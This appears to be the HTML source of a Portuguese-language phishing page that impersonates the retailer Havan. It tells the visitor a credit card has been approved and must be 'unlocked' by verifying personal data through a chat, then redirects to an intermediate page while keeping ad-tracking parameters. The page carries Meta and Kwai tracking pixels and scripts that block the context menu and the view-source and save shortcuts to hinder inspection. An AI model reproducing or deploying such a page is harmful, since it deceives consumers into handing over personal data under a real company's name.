<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <!-- Meta Pixel Code -->
    <script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '679a0347b036c59c818c7236');
    fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=679a0347b036c59c818c7236&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Meta Pixel Code -->

    <script src="js/latest.js" data-utmify-prevent-subids async defer></script>

    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    <meta charset="UTF-8">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Cartão Aprovado - Havan</title>
    <style>
        body {
            background-color: #f9f9f9;
            font-family: Arial, sans-serif;
        }

        .header {
            background: rgb(255, 255, 255);
            color: white;
            padding: 15px 0;
            text-align: center;
        }

        .header img {
            width: 120px;
        }

        .main-content {
            max-width: 600px;
            margin: 40px auto;
            background-color: white;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        .main-title {
            font-size: 28px;
            font-weight: bold;
            color: #002279;
            margin-bottom: 20px;
        }

        .congratulations {
            font-size: 18px;
            color: #333;
            margin-bottom: 30px;
            line-height: 1.5;
        }

        .subtitle {
            font-size: 16px;
            color: #666;
            margin-bottom: 30px;
            line-height: 1.6;
        }

        .btn-unlock {
            background-color: #002279;
            color: white;
            font-weight: bold;
            border: none;
            padding: 15px 40px;
            border-radius: 8px;
            font-size: 18px;
            cursor: pointer;
            transition: background-color 0.3s ease;
            text-decoration: none;
            display: inline-block;
        }

        .btn-unlock:hover {
            background-color: #001a5c;
            color: white;
            text-decoration: none;
        }

        .card-icon {
            font-size: 60px;
            margin-bottom: 20px;
        }

        .footer {
            background: #ffffff;
            border-top: 1px solid #e6e6e6;
            text-align: center;
            padding: 15px;
            font-size: 10px;
            color: #666;
        }

        .styles_company__HQYS3 {
            display: flex;
            flex-direction: column;
            justify-content: center;
            text-align: center;
            gap: 24px;
            padding: 24px 16px 32px;
        }

        .styles_company__HQYS3 p {
            font-size: .75rem;
            line-height: 16px;
            letter-spacing: 0;
        }
    </style>
    <script>
        if (document.addEventListener) {
            document.addEventListener("keydown", bloquearSource);
        } else {
            document.attachEvent("onkeydown", bloquearSource);
        }

        function bloquearSource(e) {
            e = e || window.event;
            var code = e.which || e.keyCode;
            if (e.ctrlKey && (code == 83 || code == 85)) {
                if (e.preventDefault) {
                    e.preventDefault();
                } else {
                    e.returnValue = false;
                }
                return false;
            }
        }
    </script>
    <style>
        body {
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }

        input, textarea {
            -webkit-touch-callout: initial;
            -webkit-user-select: text;
            -khtml-user-select: text;
            -moz-user-select: text;
            -ms-user-select: text;
            user-select: text;
        }

        [contenteditable=true] {
            -webkit-touch-callout: initial;
            -webkit-user-select: all;
            -khtml-user-select: all;
            -moz-user-select: all;
            -ms-user-select: all;
            user-select: all;
        }
    </style>
    <script>
        if (document.addEventListener) {
            document.addEventListener("contextmenu", function (e) {
                e.preventDefault();
                return false;
            });
        } else {
            document.attachEvent("oncontextmenu", function (e) {
                e = e || window.event;
                e.returnValue = false;
                return false;
            });
        }
    </script>

    <script>
        !function(e,t){"object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t()}(window,(function(){return function(e){var t={ };function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{ }};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o })},n.r=function(e){"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 })},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e, n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject = n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) }};i.methods.forEach((function(e){a(i, e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n, e)})),n},i.load=function(e,o){var a="../s1.kwai.net/kos/s101/nlav11187/pixel/events.html";i._i=i._i||{ },i._i[e]=[],i._i[e]._u=a,i._t=i._t||{ },i._t[e]=+new Date,i._o=i._o||{ },i._o[e]=o||{ };var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.html"+c)}}(window,document,"kwaiq")}])}));
    </script>
    <script>
        kwaiq.load('510449167530721283');
        kwaiq.page();
    </script>

    <script>
        !function(e,t){"object" == typeof exports && "object" == typeof module ? module.exports = t() : "function" == typeof define && define.amd ? define([], t) : "object" == typeof exports ? exports.install = t() : e.install = t()}(window,(function(){return function(e){var t={ };function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{ }};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e, t) || Object.defineProperty(e, t, { enumerable: !0, get: o })},n.r=function(e){"undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, { value: "Module" }), Object.defineProperty(e, "__esModule", { value: !0 })},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e, n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject = n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t] = function () { for (var n = [], r = 0; r < arguments.length; r++)n[r] = arguments[r]; var i = o([t], n, !0); e.push(i) }};i.methods.forEach((function(e){a(i, e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n, e)})),n},i.load=function(e,o){var a="../s1.kwai.net/kos/s101/nlav11187/pixel/events.html";i._i=i._i||{ },i._i[e]=[],i._i[e]._u=a,i._t=i._t||{ },i._t[e]=+new Date,i._o=i._o||{ },i._o[e]=o||{ };var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"../s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.html"+c)}}(window,document,"kwaiq")}])}));
    </script>
    <script>
        kwaiq.load('261106540113615');
        kwaiq.page();
    </script>
</head>

<body>
    <div class="header">
        <img src="assets/havan.png" alt="Logo">
    </div>

    <div class="main-content">
        <div class="card-icon">💳</div>
        <h1 class="main-title">Seu cartão chegará em até 48 Horas!</h1>
        
        <p class="congratulations">
            Parabéns! Seu cadastro está completo e seu cartão já está em produção.
        </p>
        
        <p class="subtitle">
            Seu cartão já está pronto para uso online e você já pode acessá-lo! 
            Porém, precisa fazer uma verificação de dados através do CHAT para desbloquear o cartão.
        </p>
        
        <a href="#" class="btn-unlock" onclick="redirecionarChat(event)">DESBLOQUEAR CARTÃO</a>
    </div>

    <!-- Footer -->
    <div class="styles_company__HQYS3">
        <div>
            <p class="styles_description__590uc">HAVAN S.A. | CNPJ: 79.379.491.0008-50 | Rod. Antônio Heil, 250 - Centro II, Brusque - SC, 88353-100</p>
            <p class="styles_description__590uc">© 2025 - Todos os direitos reservados</p>
        </div>
    </div>

    <script>
        function redirecionarChat(event) {
            event.preventDefault();
            // Mantém os parâmetros UTM na URL
            const urlParams = new URLSearchParams(window.location.search);
            window.location.href = 'intermediaria.html?' + urlParams.toString();
        }
    </script>
</body>
</html>

